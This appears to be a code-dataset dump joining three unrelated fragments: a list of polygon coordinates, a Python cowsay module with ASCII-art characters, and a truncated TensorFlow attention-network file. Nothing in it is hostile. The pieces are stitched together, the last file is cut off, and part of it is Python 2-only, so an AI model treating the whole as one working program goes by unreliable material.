(0.394271050286, -0.208632242358),
(0.394245953779, -0.211587246106),
(0.394220491604, -0.214541674516),
(0.394194663432, -0.217495519008),
(0.394168468923, -0.220448770977),
(0.394141907732, -0.223401421792),
(0.394114979504, -0.226353462801),
(0.394087683875, -0.229304885326),
(0.394060020473, -0.232255680662),
(0.394031988917, -0.235205840081),
(0.394003588818, -0.238155354828),
(0.393974819775, -0.241104216123),
(0.39394568138, -0.24405241516),
(0.387988826095, -0.244113658438),
(0.382027443425, -0.244173901337),
(0.376061615455, -0.244233146634),
(0.370091423476, -0.244291397143),
(0.364116948003, -0.244348655716),
(0.358138268797, -0.244404925244),
(0.352155464887, -0.244460208662),
(0.346168614593, -0.244514508946),
(0.340177795542, -0.244567829116),
(0.334183084698, -0.244620172234),
(0.328184558374, -0.244671541407),
(0.322182292262, -0.244721939783),
(0.31617636145, -0.244771370553),
(0.310166840442, -0.244819836947),
(0.304153803183, -0.244867342234),
(0.298137323079, -0.244913889719),
(0.292117473015, -0.244959482741),
(0.286094325382, -0.245004124671),
(0.280067952089, -0.245047818907),
(0.274038424593, -0.245090568876),
(0.268005813911, -0.245132378023),
(0.261970190647, -0.245173249815),
(0.255931625004, -0.245213187735),
(0.249890186813, -0.245252195273),
(0.243845945542, -0.245290275932),
(0.237798970324, -0.245327433216),
(0.23174932997, -0.245363670627),
(0.22569709299, -0.245398991664),
(0.219642327608, -0.245433399816),
(0.213585101786, -0.24546689856),
(0.207525483234, -0.245499491352),
(0.201463539431, -0.245531181626),
(0.201477818585, -0.242564995643),
(0.201491914957, -0.239598171491),
(0.201505828577, -0.236630717497),
(0.201519559473, -0.23366264197),
(0.201533107671, -0.230693953198),
(0.201546473191, -0.227724659447),
(0.20155965605, -0.224754768965),
(0.201572656261, -0.221784289979),
(0.201585473836, -0.218813230697),
(0.201598108781, -0.215841599308),
(0.201610561102, -0.212869403982),
(0.2016228308, -0.209896652871),
(0.201634917874, -0.206923354109),
(0.201646822321, -0.203949515811),
(0.201658544135, -0.200975146076),
(0.201670083307, -0.198000252984),
(0.201681439828, -0.195024844598),
(0.201692613685, -0.192048928966),
(0.201703604864, -0.189072514119),
(0.201714413349, -0.186095608071),
(0.201725039124, -0.18311821882),
(0.201735482168, -0.180140354351),
(0.201745742461, -0.17716202263),
(0.201755819982, -0.174183231612),
(0.201765714708, -0.171203989235),
(0.201775426614, -0.168224303422),
(0.201784955677, -0.165244182085),
(0.20179430187, -0.16226363312),
(0.201803465167, -0.159282664409),
(0.20181244554, -0.156301283824),
(0.201821242963, -0.153319499222),
(0.201829857408, -0.150337318447),
(0.207903619892, -0.150317575824),
(0.213975054514, -0.150297291683),
(0.22004409477, -0.150276463224),
(0.226110673998, -0.150255087655),
(0.232174725369, -0.150233162194),
(0.238236181864, -0.150210684078),
(0.244294976263, -0.150187650564),
(0.250351041124, -0.15016405894),
(0.256404308768, -0.150139906528),
(0.262454711258, -0.150115190689),
(0.268502180383, -0.150089908828),
(0.274546647639, -0.150064058401),
(0.280588044208, -0.15003763692),
(0.286626300941, -0.150010641954),
(0.292661348333, -0.14998307114),
(0.298693116511, -0.149954922183),
(0.304721535203, -0.149926192862),
(0.310746533725, -0.149896881033),
(0.316768040954, -0.149866984636),
(0.322785985312, -0.149836501693),
(0.328800294736, -0.149805430318),
(0.334810896663, -0.149773768717),
(0.340817718003, -0.149741515187),
(0.346820685117, -0.149708668125),
(0.352819723794, -0.149675226028),
(0.358814759226, -0.149641187489),
(0.364805715988, -0.149606551206),
(0.370792518008, -0.14957131598),
(0.376775088549, -0.149535480712),
(0.38275335018, -0.149499044408),
(0.388727224756, -0.149462006172),
(0.394696633387, -0.149424365211)]},
33: {'bad_channels': [3, 4],
'color': 'red',
'polygon': [(0.187776696458, -0.150607165433),
(0.18776770607, -0.153590131409),
(0.187758545238, -0.15657270112),
(0.187749213998, -0.159554866732),
(0.187739712387, -0.1625366204),
(0.187730040444, -0.165517954266),
(0.187720198203, -0.168498860458),
(0.1877101857, -0.171479331092),
(0.187700002971, -0.17445935827),
(0.18768965005, -0.177438934082),
(0.18767912697, -0.180418050601),
(0.187668433765, -0.183396699889),
(0.187657570465, -0.18637487399),
(0.187646537101, -0.189352564936),
(0.187635333702, -0.192329764742),
(0.187623960297, -0.195306465409),
(0.187612416911, -0.19828265892),
(0.187600703568, -0.201258337244),
(0.187588820293, -0.204233492334),
(0.187576767105, -0.207208116123),
(0.187564544024, -0.210182200531),
(0.187552151066, -0.213155737459),
(0.187539588247, -0.216128718789),
(0.187526855578, -0.219101136388),
(0.18751395307, -0.222072982102),
(0.187500880728, -0.225044247762),
(0.187487638559, -0.228014925177),
(0.187474226562, -0.230985006139),
(0.187460644736, -0.233954482419),
(0.187446893077, -0.23692334577),
(0.187432971575, -0.239891587925),
(0.18741888022, -0.242859200596),
(0.187404618995, -0.245826175474),
(0.1813354856, -0.245852843833),
(0.175264315409, -0.245878622804),
(0.169191174943, -0.24590351565),
(0.163116130592, -0.245927525584),
(0.157039248622, -0.245950655761),
(0.150960595201, -0.245972909278),
(0.1448802364, -0.245994289165),
(0.138798238217, -0.246014798386),
(0.132714666581, -0.246034439829),
(0.12662958737, -0.246053216307),
(0.120543066419, -0.246071130552),
(0.114455169534, -0.246088185209),
(0.108365962504, -0.246104382835),
(0.102275511106, -0.246119725897),
(0.0961838811234, -0.246134216762),
(0.090091138348, -0.246147857701),
(0.0839973485942, -0.246160650879),
(0.0779025777063, -0.246172598357),
(0.0718068915676, -0.246183702088),
(0.0657103561079, -0.24619396391),
(0.0596130373119, -0.24620338555),
(0.0535150012265, -0.246211968616),
(0.0474163139672, -0.246219714596),
(0.0413170417257, -0.246226624858),
(0.0352172507752, -0.246232700644),
(0.029117007477, -0.246237943073),
(0.0230163782855, -0.246242353134),
(0.0169154297535, -0.246245931687),
(0.0108142285374, -0.246248679464),
(0.00471284140113, -0.246250597063),
(-0.00138866477951, -0.246251684949),
(-0.00749022301292, -0.246251943455),
(-0.00749062418694, -0.243279686236),
(-0.0074910204973, -0.240306793531),
(-0.00749141199938, -0.237333273502),
(-0.00749179874882, -0.234359134297),
(-0.00749218080159, -0.231384384046),
(-0.00749255821387, -0.228409030867),
(-0.00749293104204, -0.225433082861),
(-0.00749329934251, -0.222456548115),
(-0.00749366317177, -0.219479434703),
(-0.00749402258637, -0.216501750682),
(-0.0074943776427, -0.213523504097),
(-0.00749472839703, -0.210544702979),
(-0.00749507490553, -0.207565355345),
(-0.00749541722408, -0.204585469199),
(-0.00749575540829, -0.201605052531),
(-0.00749608951347, -0.19862411332),
(-0.00749641959453, -0.19564265953),
(-0.00749674570591, -0.192660699116),
(-0.00749706790165, -0.189678240017),
(-0.00749738623523, -0.186695290162),
(-0.0074977007595, -0.183711857468),
(-0.00749801152679, -0.180727949841),
(-0.00749831858874, -0.177743575175),
(-0.00749862199626, -0.174758741353),
(-0.00749892179957, -0.171773456246),
(-0.00749921804805, -0.168787727716),
(-0.00749951079032, -0.165801563615),
(-0.00749980007416, -0.162814971782),
(-0.00750008594633, -0.159827960048),
(-0.00750036845284, -0.156840536235),
(-0.00750064763858, -0.153852708152),
(-0.00750092354758, -0.150864483603),
(-0.00138730045512, -0.15086403347),
(0.00472626736655, -0.150863103869),
(0.0108397124665, -0.150861694614),
(0.0169529675116, -0.150859805391),
(0.0230659652855, -0.150857435762),
(0.0291786386867, -0.150854585164),
(0.0352909207265, -0.150851252913),
(0.0414027445267, -0.150847438201),
(0.0475140433172, -0.150843140102),
(0.0536247504324, -0.150838357573),
(0.0597347993085, -0.150833089453),
(0.0658441234792, -0.150827334471),
(0.0719526565719, -0.150821091242),
(0.0780603323029, -0.150814358276),
(0.0841670844731, -0.150807133975),
(0.0902728469618, -0.150799416643),
(0.0963775537219, -0.150791204483),
(0.102481138773, -0.150782495602),
(0.108583536196, -0.15077328802),
(0.114684680123, -0.150763579665),
(0.120784504736, -0.150753368385),
(0.126882944253, -0.150742651948),
(0.13297993292, -0.150731428045),
(0.139075405009, -0.150719694301),
(0.145169294799, -0.150707448272),
(0.151261536575, -0.150694687455),
(0.157352064613, -0.150681409291),
(0.16344081317, -0.15066761117),
(0.169527716473, -0.150653290437),
(0.175612708711, -0.150638444395),
(0.181695724016, -0.150623070314),
(0.187776696458, -0.150607165433)]},
34: {'color': 'violet',
'polygon': [(-0.0109948898159, -0.150885055847),
(-0.0109926227084, -0.153873270396),
(-0.0109903493576, -0.156861088346),
(-0.0109880697254, -0.159848501893),
(-0.010985783772, -0.162835503225),
(-0.0109834914572, -0.16582208452),
(-0.0109811927395, -0.168808237945),
(-0.0109788875766, -0.171793955659),
(-0.0109765759254, -0.174779229809),
(-0.010974257742, -0.177764052533),
(-0.0109719329815, -0.180748415958),
(-0.0109696015986, -0.183732312199),
(-0.0109672635468, -0.186715733361),
(-0.0109649187794, -0.189698671538),
(-0.0109625672488, -0.192681118811),
(-0.0109602089068, -0.195663067252),
(-0.0109578437049, -0.198644508917),
(-0.0109554715938, -0.201625435854),
(-0.0109530925239, -0.204605840097),
| |
<reponame>rashid-nhm/cowsay<filename>cowsay.py
#!/usr/bin/env python3
import random
from enum import Enum
# Credits for the original perl cowsay and the Python ports this builds on.
ACKNOWLEDGEMENTS = """
cowsay for GNU/Linux was initially written in perl by <NAME> (<EMAIL>), with suggestions from
<NAME> (<EMAIL>) and contributions from <NAME> (<EMAIL>).
This code was originally written by: <NAME>
https://pypi.org/project/cowsay/
https://github.com/VaasuDevanS/cowsay-python
All base characters, newline logic is from his code!
The code was updated by: <NAME>
https://github.com/rashid-nhm/cowsay
"""
__author__ = "<NAME>"
# NOTE(review): rebinding the module-level __name__ defeats any
# `if __name__ == "__main__"` guard in this file -- presumably intentional
# branding, but worth confirming.
__name__ = "cowsay"
__license__ = "MIT"
# NOTE(review): __version__ is conventionally a string ("2.0"), not a float.
__version__ = 2.0
# Maximum characters per speech-bubble line before text is hard-wrapped.
max_line_len = 50
class CowString(str):
    """A str whose repr is the raw text itself.

    This lets the ASCII art display cleanly in the interactive interpreter
    (no surrounding quotes, no escaped newlines).
    """

    def __init__(self, value):
        # str is immutable; construction happens in __new__, nothing to do.
        super().__init__()

    def __repr__(self):
        # Show the text verbatim instead of the quoted str repr.
        return str.__str__(self)
class Characters(Enum):
    """ASCII-art bodies for each cowsay character.

    Each member's value is the raw art block that is appended beneath the
    speech bubble by ``__say``; spacing inside the strings is significant,
    as are the doubled backslashes (the art is stored escaped).
    """
    beavis = """
__------~~-,
,' ,
/ \\
/ :
| '
| |
| |
| _-- |
_| =-. .-. ||
o|/o/ _. |
/ ~ \\ |
(____\@) ___~ |
|_===~~~.` |
_______.--~ |
\\________ |
\\ |
__/-___-- -__
/ _ \\
"""
    cheese = """
/ \\_/ |
| ||
| ||
| ###\\ /### | |
| 0 \\/ 0 | |
/| | |
/ | < |\\ \\
| /| | | |
| | \\_______/ | | |
| | | / /
/|| /|||
----------------|
| | | |
*** ***
/___\\ /___\\
"""
    daemon = """
/- _ `-/ '
(/\\/ \\ \\ /\\
/ / | ` \\
O O ) / |
`-^--'`< '
(_.) _ ) /
`.___/` /
`-----' /
<----. __ / __ \\
<----|====O)))==) \\) /====
<----' `--' `.__,' \\
| |
\\ /
______( (_ / \\______
,' ,-----' | \\
`--{__________) \\/
"""
    cow = """
^__^
(oo)\_______
(__)\ )\/\
||----w |
|| ||
"""
    dragon = """
/ \\ //\\
|\\___/| / \\// \\\\
/0 0 \\__ / // | \\ \\
/ / \\/_/ // | \\ \\
\@_^_\@'/ \\/_ // | \\ \\
//_^_/ \\/_ // | \\ \\
( //) | \\/// | \\ \\
( / /) _|_ / ) // | \\ _\\
( // /) '/,_ _ _/ ( ; -. | _ _\\.-~ .-~~~^-.
(( / / )) ,-{ _ `-.|.-~-. .~ `.
(( // / )) '/\\ / ~-. _ .-~ .-~^-. \\
(( /// )) `. { } / \\ \\
(( / )) .----~-.\\ \\-' .~ \\ `. \\^-.
///.----..> \\ _ -~ `. ^-` ^-_
///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~
/.-~
"""
    ghostbusters = """
__---__
_- /--______
__--( / \\ )XXXXXXXXXXX\\v.
.-XXX( O O )XXXXXXXXXXXXXXX-
/XXX( U ) XXXXXXX\\
/XXXXX( )--_ XXXXXXXXXXX\\
/XXXXX/ ( O ) XXXXXX \\XXXXX\\
XXXXX/ / XXXXXX \\__ \\XXXXX
XXXXXX__/ XXXXXX \\__---->
---___ XXX__/ XXXXXX \\__ /
\\- --__/ ___/\\ XXXXXX / ___--/=
\\-\\ ___/ XXXXXX '--- XXXXXX
\\-\\/XXX\\ XXXXXX /XXXXX
\\XXXXXXXXX \\ /XXXXX/
\\XXXXXX > _/XXXXX/
\\XXXXX--__/ __-- XXXX/
-XXXXXXXX--------------- XXXXXX-
\\XXXXXXXXXXXXXXXXXXXXXXXXXX/
""VXXXXXXXXXXXXXXXXXXV""
"""
    kitty = """
("`-' '-/") .___..--' ' "`-._
` *_ * ) `-. ( ) .`-.__. `)
(_Y_.) ' ._ ) `._` ; `` -. .-'
_.. `--'_..-_/ /--' _ .' ,4
( i l ),-'' ( l i),' ( ( ! .-'
"""
    meow = """
_ ___.--'''`--''//-,-_--_.
\\`"' ` || \\\\ \\ \\\\/ / // / ,-\\\\`,_
/'` \\ \\ || Y | \\|/ / // / - |__ `-,
/\@"\\ ` \\ `\\ | | ||/ // | \\/ \\ `-._`-,_.,
/ _.-. `.-\\,___/\\ _/|_/_\\_\\/|_/ | `-._._)
`-'``/ / | // \\__/\\__ / \\__/ \\
`-' /-\\/ | -| \\__ \\ |-' |
__/\\ / _/ \\/ __,-' ) ,' _|'
(((__/(((_.' ((___..-'((__,'
"""
    milk = """
____________
|__________|
/ /\\
/ / \\
/___________/___/|
| | |
| ==\\ /== | |
| O O | \\ \\ |
| < | \\ \\|
/| | \\ \\
/ | \\_____/ | / /
/ /| | / /|
/||\\| | /||\\/
-------------|
| | | |
<__/ \\__>
"""
    stegosaurus = """
/ `. .' "
.---. < > < > .---.
| \\ \\ - ~ ~ - / / |
_____ ..-~ ~-..-~
| | \\~~~\\.' `./~~~/
--------- \\__/ \\__/
.' O \\ / / \\ "
(_____, `._.' | } \\/~~~/
`----. / } | / \\__/
`-. | / | / `. ,~~|
~-.__| /_ - ~ ^| /- _ `..-'
| / | / ~-. `-. _ _ _
|_____| |_____| ~ - . _ _ _ _ _>
"""
    stimpy = """
. _ .
|\\_|/__/|
/ / \\/ \\ \\
/__|O||O|__ \\
|/_ \\_/\\_/ _\\ |
| | (____) | ||
\\/\\___/\\__/ //
(_/ ||
| ||
| ||\\
\\ //_/
\\______//
__ || __||
(____(____)
"""
    turkey = """
,+*^^*+___+++_
,*^^^^ )
_+* ^**+_
+^ _ _++*+_+++_, )
_+^^*+_ ( ,+*^ ^ \\+_ )
{ ) ( ,( ,_+--+--, ^) ^\\
{ (\@) } f ,( ,+-^ __*_*_ ^^\\_ ^\\ )
{:;-/ (_+*-+^^^^^+*+*<_ _++_)_ ) ) /
( / ( ( ,___ ^*+_+* ) < < \\
U _/ ) *--< ) ^\\-----++__) ) ) )
( ) _(^)^^)) ) )\\^^^^^))^*+/ / /
( / (_))_^)) ) ) ))^^^^^))^^^)__/ +^^
( ,/ (^))^)) ) ) ))^^^^^^^))^^) _)
*+__+* (_))^) ) ) ))^^^^^^))^^^^^)____*^
\\ \\_)^)_)) ))^^^^^^^^^^))^^^^)
(_ ^\\__^^^^^^^^^^^^))^^^^^^^)
^\\___ ^\\__^^^^^^))^^^^^^^^)\\\\
^^^^^\\uuu/^^\\uuu/^^^^\\^\\^\\^\\^\\^\\^\\^\\
___) >____) >___ ^\\_\\_\\_\\_\\_\\_\\)
^^^//\\\\_^^//\\\\_^ ^(\\_\\_\\_\\)
^^^ ^^ ^^^ ^
"""
    turtle = """
___-------___
_-~~ ~~-_
_-~ /~-_
/^\\__/^\\ /~ \\ / \\
/| O|| O| / \\_______________/ \\
| |___||__| / / \\ \\
| \\ / / \\ \\
| (_______) /______/ \\_________ \\
| / / \\ / \\
\\ \\^\\\\ \\ / \\ /
\\ || \\______________/ _-_ //\\__//
\\ ||------_-~~-_ ------------- \\ --/~ ~\\ || __/
~-----||====/~ |==================| |/~~~~~
(_(__/ ./ / \\_\\ \\.
(_(___/ \\_____)_)
"""
    tux = """
.--.
|o_o |
|:_/ |
// \\ \\
(| | )
/'\\_ _/`\\
\\___)=(___/
"""
def character_names():
    """Return the name of every available character, in definition order."""
    # __members__ preserves Enum definition order; no aliases exist here,
    # so this matches iterating the Enum and taking .name.
    return list(Characters.__members__)
def character_functions():
    """Return the callable for every character, parallel to character_names()."""
    funcs = (beavis, cheese, daemon, cow, dragon,
             ghostbusters, kitty, meow, milk, stegosaurus,
             stimpy, turkey, turtle, tux)
    return list(funcs)
def process_string(func):
    """Decorator that wraps *txt* in a cowsay speech bubble before calling *func*.

    The wrapped function receives the bubble text plus a ``max_line`` keyword
    holding the width of the longest bubble line. Lines longer than
    ``max_line_len`` are hard-wrapped and the processor recurses on the
    reflowed text. Empty/whitespace-only input deliberately raises (``max()``
    on an empty list) so that ``apologize_if_fail_for`` can emit its
    "nothing to say" apology -- do not "fix" that path.
    """
    def string_processor(txt, *args, **kwargs):
        txt = str(txt)
        lines = [i.strip() for i in txt.split("\n") if len(i.strip()) != 0]
        if len(lines) == 1:
            line_len = len(lines[0])
            if line_len <= max_line_len:
                # Single short line: "< text >" style bubble.
                ret_txt = f" {'_'*line_len}\n /{' '*line_len}\\\n< {lines[0]}{' '*(line_len - len(lines[0]) + 1)}>\n "\
                          f"{'='*line_len}\n"
            else:
                # Single long line: insert newlines every max_line_len chars
                # and recurse to format it as a multi-line bubble.
                lines = list("".join(lines[0]))
                for i, line in enumerate(lines):
                    if i and i % max_line_len == 0:
                        lines.insert(i, "\n")
                return string_processor("".join(lines), *args, **kwargs)
        else:
            line_len = len(max(lines, key=len))
            if all(len(line) <= max_line_len for line in lines):
                ret_txt = f" {'_'*line_len}\n /{' '*line_len}\\\n"
                for line in lines:
                    # BUG FIX: was `ret_txt = ...`, which discarded the bubble
                    # header and every previously formatted line on each pass.
                    ret_txt += f"| {line}{' '*(line_len-len(line)+1)}|\n"
                ret_txt += f" \\{' '*line_len}/\n {'='*line_len}\n"
            else:
                # Wrap any over-long line, then recurse on the reflowed text.
                new_lines = []
                for line in lines:
                    if len(line) > max_line_len:
                        joined_line = list("".join(line))
                        for i, char in enumerate(joined_line):
                            if i and i % max_line_len == 0:
                                joined_line.insert(i, "\n")
                        new_lines.append("".join(joined_line))
                    else:
                        new_lines.append(line + "\n")
                return string_processor("".join(new_lines), *args, **kwargs)
        return func(ret_txt, *args, max_line=line_len, **kwargs)
    return string_processor
def apologize_if_fail_for(character_name):
    """Decorator factory: if the wrapped say-function raises, apologize instead.

    An empty/whitespace-only message gets a "nothing to say" apology; any
    other failure gets a generic "could not parse" apology. Both are rendered
    through the same wrapped function, so the character still draws.
    """
    def apologize(func):
        def apology(*args, **kwargs):
            try:
                return func(*args, **kwargs)
            # BUG FIX: was a bare `except:`, which also swallowed
            # SystemExit and KeyboardInterrupt.
            except Exception:
                if not str(args[0]).strip():
                    return func(f"You didn't actually give {character_name} anything to say...")
                return func(f"I was not able to parse and say what you wanted. Please give {character_name} something "
                            f"easier or different")
        return apology
    return apologize
@process_string
def __say(txt, base_character, max_line=max_line_len, left_pad=0):
    """Attach the speech-bubble tail and the character art below the bubble."""
    # Diagonal tail: four backslashes stepping down-right from the bubble edge.
    tail = "".join(" " * (max_line + i) + "\\\n" for i in range(5, 9))
    # Character art, shifted right so it sits under the tail.
    art_lines = (line for line in base_character.value.split("\n") if line)
    art = "".join(" " * (max_line + left_pad) + line + "\n" for line in art_lines)
    return CowString(txt + tail + art)
# ---------------------------------------------------------------------------
# Public character functions. Each wraps __say with its character's art and a
# left_pad tuned so the art lines up under the speech-bubble tail. All are
# guarded by apologize_if_fail_for, so bad input yields an in-character
# apology rather than a traceback.
# ---------------------------------------------------------------------------
@apologize_if_fail_for("beavis")
def beavis(txt):
    return __say(txt, Characters.beavis, left_pad=7)
@apologize_if_fail_for("cheese")
def cheese(txt):
    return __say(txt, Characters.cheese, left_pad=3)
@apologize_if_fail_for("daemon")
def daemon(txt):
    return __say(txt, Characters.daemon, left_pad=-2)
@apologize_if_fail_for("cow")
def cow(txt):
    return __say(txt, Characters.cow, left_pad=10)
@apologize_if_fail_for("dragon")
def dragon(txt):
    return __say(txt, Characters.dragon, left_pad=0)
@apologize_if_fail_for("ghostbusters")
def ghostbusters(txt):
    return __say(txt, Characters.ghostbusters, left_pad=0)
@apologize_if_fail_for("kitty")
def kitty(txt):
    return __say(txt, Characters.kitty, left_pad=3)
@apologize_if_fail_for("meow")
def meow(txt):
    return __say(txt, Characters.meow, left_pad=3)
@apologize_if_fail_for("milk")
def milk(txt):
    return __say(txt, Characters.milk, left_pad=3)
@apologize_if_fail_for("stegosaurus")
def stegosaurus(txt):
    return __say(txt, Characters.stegosaurus, left_pad=0)
@apologize_if_fail_for("stimpy")
def stimpy(txt):
    return __say(txt, Characters.stimpy, left_pad=7)
@apologize_if_fail_for("turkey")
def turkey(txt):
    return __say(txt, Characters.turkey, left_pad=2)
@apologize_if_fail_for("turtle")
def turtle(txt):
    return __say(txt, Characters.turtle, left_pad=5)
@apologize_if_fail_for("tux")
def tux(txt):
    return __say(txt, Characters.tux, left_pad=5)
# Generic entry point: defaults to the classic cow.
@apologize_if_fail_for("me")
def say(txt):
    return __say(txt, Characters.cow, left_pad=10)
def | |
<gh_stars>0
# -*- coding=utf-8 -*-
# weakly label version
import tensorflow as tf
from OHEM import OHNM_batch
import numpy as np
# Shorthand for the TF-Slim layer library (TensorFlow 1.x contrib API).
slim = tf.contrib.slim
# Supported backbone identifiers.
MODEL_TYPE_vgg16 = 'vgg16'
MODEL_TYPE_vgg16_no_dilation = 'vgg16_no_dilation'
# Dice-term coefficient -- presumably combined with the OHEM cross-entropy
# loss elsewhere; confirm against the training script.
dice_coff = 0.5
# Multi-scale flag (off by default).
ms_flag = False
# Feature-fusion strategy names. NOTE: the 'upsamle' misspellings are part
# of the public string values -- do not "fix" them without migrating configs.
FUSE_TYPE_cascade_conv1x1_upsample_sum = 'cascade_conv1x1_upsample_sum'
FUSE_TYPE_cascade_conv1x1_128_upsamle_sum_conv1x1_2 = \
    'cascade_conv1x1_128_upsamle_sum_conv1x1_2'
FUSE_TYPE_cascade_conv1x1_128_upsamle_concat_conv1x1_2 = \
    'cascade_conv1x1_128_upsamle_concat_conv1x1_2'
# Backbone layer names used as skip connections ('res50' not populated yet).
skip_connection_setting = {
    'vgg16': ['conv1_2','conv2_2', 'conv3_3', 'conv4_3', 'fc7'],
    'res50': [],
}
def compute_EDM_tf(tensor):
    '''
    Compute the pairwise Euclidean distance matrix of the rows of `tensor`,
    via the Gram-matrix identity ||a-b||^2 = ||a||^2 + ||b||^2 - 2<a,b>.

    :param tensor: N * C feature matrix
    :return: N * N distance matrix
    '''
    shape = tensor.get_shape().as_list()
    # Gram matrix G[i,j] = <row_i, row_j>
    G = tf.matmul(tensor, tf.transpose(tensor, perm=[1, 0]))
    # H[i,j] = ||row_j||^2 (squared norms broadcast across rows via tile)
    diag_tensor = tf.expand_dims(tf.diag_part(G), axis=0)
    H = tf.tile(diag_tensor, [shape[0], 1])
    # BUG FIX: clamp at zero before sqrt -- floating-point error can make the
    # squared distance slightly negative, which tf.sqrt turns into NaN.
    squared = tf.maximum(H + tf.transpose(H, perm=[1, 0]) - 2. * G, 0.)
    D = tf.sqrt(squared)
    return D
class GlobalSimilarityAttention:
    def __init__(self, feature_map, name, arg_sc):
        '''
        Self-attention over all spatial positions of a feature map, with
        attention weights derived from pairwise Euclidean distances.
        The result is stored in self.output_feature_map, same shape as input.

        :param feature_map: N * H * W * C
        :param name: variable-scope name
        :param arg_sc: slim arg_scope applied to the enclosed ops
        '''
        with tf.variable_scope(name):
            with slim.arg_scope(arg_sc):
                shape = feature_map.get_shape().as_list()
                # Flatten spatial dims: N * (H*W) * C
                feature_map = tf.reshape(feature_map, [shape[0], -1, shape[-1]])
                # Per-example pairwise distance matrices: N * (H*W) * (H*W)
                distance = tf.map_fn(lambda feature: compute_EDM_tf(feature), feature_map)
                print('distance is ', distance)
                # NOTE(review): sigmoid of the raw (unnormalized) distance is
                # used as the attention weight; rows are not softmax-normalized
                # -- confirm this is intentional.
                alpha = tf.sigmoid(distance)
                print('the similarity matrix is ', alpha)
                print('the feature_map is ', feature_map)
                # Aggregate features from all positions, weighted by alpha.
                o = tf.matmul(alpha, feature_map)
                print('delta feature is ', o)
                # Learnable residual gate, initialized to 0 so the block
                # starts as an identity mapping.
                beta = tf.get_variable('beta', [], dtype=tf.float32, initializer=tf.constant_initializer(0.0))
                feature_map = beta * o + feature_map
                # Restore the original N * H * W * C shape.
                feature_map = tf.reshape(feature_map, shape)
                self.output_feature_map = feature_map
class LocalSimilarityAttention:
    # Local (k x k neighbourhood) counterpart of GlobalSimilarityAttention.
    # NOTE(review): this block uses Python 2-only syntax (tuple-unpacking
    # lambda in tf.map_fn and a bare `print` statement) — it will not parse
    # on Python 3 without changes.
    def __init__(self, feature_map, k, name, arg_sc):
        '''
        Re-weight each pixel feature by a sigmoid-mapped distance to the
        pixels in its k x k neighbourhood, blending the aggregate back in
        through a learned scalar `beta` (zero-initialised, identity at init).

        :param feature_map: N * H * W * C input tensor
        :param k: neighbourhood window size (assumed odd)
        :param name: variable scope name
        :param arg_sc: slim arg scope applied while building the module
        '''
        with tf.variable_scope(name):
            with slim.arg_scope(arg_sc):
                shape = feature_map.get_shape().as_list()
                # Drop the k//2 border so every kept pixel has a full window.
                cropped_feature_map = feature_map[:, k//2:shape[1]-k//2, k//2:shape[2]-k//2, :]
                cropped_feature_map = tf.reshape(cropped_feature_map, [shape[0], -1, shape[-1]])
                # Extract every pixel's k*k neighbourhood as a patch.
                patches = tf.extract_image_patches(feature_map, ksizes=[1, k, k, 1], strides=[1, 1, 1, 1],
                                                   rates=[1, 1, 1, 1], padding='VALID')
                patches_shape = patches.get_shape().as_list()
                patches = tf.reshape(patches, [patches_shape[0], -1, k * k, shape[-1]])
                patches = tf.transpose(patches, perm=[0, 2, 1, 3])
                print('the patches is ', patches)
                print('the cropped_feature_map is ', cropped_feature_map)
                # Distance between each pixel's feature and each of its
                # k*k neighbours' features.
                distance = tf.map_fn(
                    lambda (feature_example, patch_example): tf.map_fn(
                        lambda patch_neighbor: tf.reduce_sum((feature_example - patch_neighbor) ** 2, axis=-1),
                        patch_example),
                    [cropped_feature_map, patches], dtype=tf.float32)
                print('distance is ', distance)
                # NOTE(review): sigmoid of a distance weights *dissimilar*
                # neighbours more heavily — confirm intended.
                alpha = tf.sigmoid(distance)
                # Aggregate neighbours weighted by alpha.
                o = tf.reduce_sum(patches * tf.expand_dims(alpha, axis=3), axis=1)
                beta = tf.get_variable('beta', [], tf.float32, initializer=tf.constant_initializer(0.0))
                cropped_feature_map = o * beta + cropped_feature_map
                print 'cropped_feature_map is ', cropped_feature_map
                # Restore spatial layout and resize back to the input size.
                output_feature_map = tf.reshape(cropped_feature_map, [shape[0], shape[1]-k+1, shape[2]-k+1, shape[3]])
                output_feature_map = tf.image.resize_images(output_feature_map, [shape[1], shape[2]])
                print('output_feature_map is ', output_feature_map)
                self.output_feature_map = output_feature_map
def transpose2D(input_tensor, upsample_rate, transpose_kernel_size, use_batchnorm, is_training):
    """Upsample `input_tensor` with a learned transposed convolution.

    Channel count is preserved; spatial dims grow by `upsample_rate`.
    Optionally applies batch norm, then a ReLU.
    """
    print('decoder is tranpose2D')
    num_channels = input_tensor.get_shape().as_list()[-1]
    upsampled = slim.conv2d_transpose(
        input_tensor,
        num_outputs=num_channels,
        kernel_size=transpose_kernel_size,
        stride=upsample_rate,
        biases_initializer=None)
    if use_batchnorm:
        upsampled = slim.batch_norm(upsampled, is_training=is_training)
    return tf.nn.relu(upsampled)
def upsampling2D(input_tensor, upsample_rate):
    """Resize `input_tensor` spatially by `upsample_rate` (parameter-free)."""
    print('decoder is upsampling2D')
    height, width = input_tensor.get_shape().as_list()[1:3]
    target_size = [height * upsample_rate, width * upsample_rate]
    return tf.image.resize_images(input_tensor, target_size)
class TaskNetworkModuleV2(object):
    '''
    FPN-style decoder head. Compared with the previous version, this one
    adds multi-scale fusion: each skip level is merged with the upsampled
    deeper level, and all levels are resized and concatenated for the
    final prediction.
    '''
    def __init__(self, input_tensors, output_dim, output_shape, arg_sc, name, decoder='upsampling', is_training=True, hidden_dim=128):
        '''
        :param input_tensors: skip-connection feature maps, deepest first
        :param output_dim: number of output channels of the head
        :param output_shape: [H, W] target size for the merged features
        :param arg_sc: slim arg scope applied while building the module
        :param name: variable scope name
        :param decoder: 'upsampling' (resize) or 'transpose' (learned)
        :param is_training: passed to batch norm in the transpose decoder
        :param hidden_dim: channel width of the intermediate convolutions
        '''
        last_output = None
        # regularizer = tf.contrib.layers.l2_regularizer(scale=0.01)
        # Iterate from deep to shallow layers.
        final_output = []
        # When True, the deeper level is scaled by a learned per-level alpha
        # before concatenation.
        learnable_merged_flag = True
        different_scale_outputs = []
        with tf.variable_scope(name):
            with slim.arg_scope(arg_sc):
                for idx, input_tensor in enumerate(input_tensors):
                    if last_output is not None:
                        if learnable_merged_flag:
                            alpha = tf.get_variable('alpha_' + str(idx), shape=[], dtype=tf.float32,
                                                    initializer=tf.ones_initializer(),
                                                    regularizer=None)
                            tf.summary.scalar('alpha_' + str(idx), alpha)
                        # Upsample the deeper level to this level's resolution.
                        if decoder == 'upsampling':
                            last_output = upsampling2D(last_output, 2)
                        elif decoder == 'transpose':
